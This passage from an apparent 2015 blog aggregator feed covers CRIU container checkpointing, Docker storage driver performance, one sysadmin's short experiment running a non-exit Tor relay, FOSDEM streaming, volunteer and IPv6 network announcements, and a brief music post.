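criu dump -t $PID --images-dir /tmp/checkpoint --shell-job
# Later, possibly on another host after copying the images over:
criu restore --images-dir /tmp/checkpoint --shell-job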

There are some caveats that can occur after a checkpoint / restore that you should be aware of. And there are a variety of resources that cannot be checkpointed inside a container. In order to resume TCP connections, at least kernel 3.5 is needed for the TCP_REPAIR support.

CRIU is not yet integrated into Docker, but that should be only a matter of time.

Are there alternative solutions to the whole live migration of containers issue?

by Mattias Geniar at February 01, 2015 09:34 AM

Docker Storage Performance Tests

Red Hat has published two very interesting blog posts concerning the performance of Docker, and more specifically -- the storage drivers available. They're over 6 months old, but still relevant and mentioned in this weekend's Fosdem talks.

Which storage driver are you using?

You can use docker info to find out.

$ docker info
Containers: 21
Images: 47
...
Storage Driver: aufs
 Root Dir: /var/lib/docker/aufs
 Dirs: 89
...

The "Storage Driver" section contains all your info. In my case, it's using aufs because the aufs-tools package is installed. After the install, Docker will magically start to use the aufs driver for your docker containers.

Storage "Graph" Driver performance tests

Docker users can choose between devicemapper, vfs, aufs, btrfs and OverlayFS (kernel 3.18+) for their storage driver, each with its own pros and cons. So which one to pick?
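
If you want to experiment with a specific driver, you can pass it to the daemon explicitly. A sketch assuming the Docker 1.x daemon invocation; note that the data under /var/lib/docker is driver-specific, so switching drivers means re-pulling your images:

# Start the daemon with an explicit storage driver (Docker 1.x flag syntax)
docker -d --storage-driver=devicemapper
# ... and verify afterwards:
docker info | grep 'Storage Driver'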

The Red Hat blog post "Comprehensive Overview of Storage Scalability in Docker" has some very interesting stats on each of those drivers. I suggest having a look at it when implementing Docker in your environment.

Docker performance on RHEL 7

A month earlier, Red Hat published another blog post on Docker performance on their RHEL7 platform. This led to a presentation they shared on YouTube.

Again, a recommended watch if you're going to give Docker a try.

by Mattias Geniar at February 01, 2015 08:51 AM

January 30, 2015

Mattias Geniar

Running a Tor relay: lessons learned

Mozilla recently announced they'll be running their own Tor relays to support the Tor project.

As an experiment, I added a Tor relay (not an exit node, I had no interest in dealing with complaints/abuse reports) to my own server a few weeks earlier, to see what kind of traffic it would/could do.

After the initial setup, your relay goes through a "learning period" of a few days, during which it is evaluated. If it's stable, it'll receive more traffic along the way. After a few days, it was already peaking at over 80Mbps (around 10MB/s). This was faster than I had anticipated, so I killed the relay shortly after, and it's no longer running at this point.

tor_relay_bandwidth

In terms of CPU, this was a very low-end server and it peaked at around 30% when it was pushing around 80Mbps.

tor_relay_cpu

The top 10 relay list in the Tor Globe shows the most active relay pushing more than 130MB/s of traffic: more than a completely saturated 1Gbps connection.

I considered this an experiment: to see what technical hurdles are involved in setting up a Tor relay, how it works from a technical point of view, what happens to your server, ... Technically, it's super easy to set up. Pre-made packages are available, configs are explained and up-to-date setup guides are present.
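
For reference, a middle (non-exit) relay only takes a handful of torrc lines. A sketch with illustrative values; see the Tor manual for the full option list:

# Minimal non-exit relay sketch; nickname and limits are illustrative
ORPort 9001
Nickname myrelay
# relay traffic only, never act as an exit
ExitPolicy reject *:*
# throttle so the relay can't saturate your uplink
RelayBandwidthRate 5 MBytes
RelayBandwidthBurst 10 MBytes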

But as a sysadmin for a hosting provider, I must admit I have mixed feelings about the Tor project. On the one hand, I love the ideal of Tor, of allowing users anonymous access to the public internet. Especially if your government is limiting freedom of speech by filtering the internet. But as a sysadmin, I more often see the negative aspects of traffic relayed through Tor: low-bandwidth denial of service attacks, SQL injection attacks, online abuse, harassment, ...

It's so easy to run everything through Tor as a client that it's being abused more and more by "attackers". Site reconnaissance, executing attacks on vulnerable content management systems, ... a lot of script kiddie tools have Tor support built in, to make it even easier.

So while I appreciate Tor from a distance, I won't be running a Tor relay again any time soon.

by Mattias Geniar at January 30, 2015 04:54 PM

FOSDEM organizers

Recording and streaming mostly working!

As pointed out during the opening talk, we have a completely new recording and streaming workflow this year. After some teething problems this morning, we're happy to report that most things are now working! Unfortunately, we were not able to record or stream the opening presentation and the first part of Karen Sandler's Identity Crisis keynote. Our video team and network team are working hard to fix the remaining issues and we hope to have everything working smoothly in very short order. Keep an eye on https://live.fosdem.org/ for streams! Note that even if the streams…

January 30, 2015 03:00 PM

FOSDEM needs you!

If you have some spare energy, the FOSDEM team would really appreciate some more volunteers, particularly for crowd control and infodesk duty (selling t-shirts, being helpful, etc). Please report to the infodesk in the K building (ask for Koert!) to claim a bright orange t-shirt and help us make FOSDEM even better!

January 30, 2015 03:00 PM

IPv6-only wireless network again!

Last year we turned off IPv4 on our main FOSDEM wireless network. The idea is to confront developers with the IPv6 reality and encourage them to fix bugs. Progress has been made, but there is a lot of work left to do! FOSDEM is a unique opportunity to confront thousands of developers with an IPv6-only reality. We are hopeful that making our default network IPv6-only will encourage people to fix bugs in applications and devices. The FOSDEM network has NAT64 and DNS64 transition measures in place for communicating with the legacy internet. For those who need it, the FOSDEM-legacy wireless…

January 30, 2015 03:00 PM

Frank Goossens

Music from Our Tube: Uncle Tupelo – Sandusky

Before Jeff Tweedy went solo he was in Wilco, and even before that he was in Uncle Tupelo. This is a nice little gem of an instrumental from back in those days:

Watch this video on YouTube or on Easy Youtube.

by frank at January 30, 2015 05:54 AM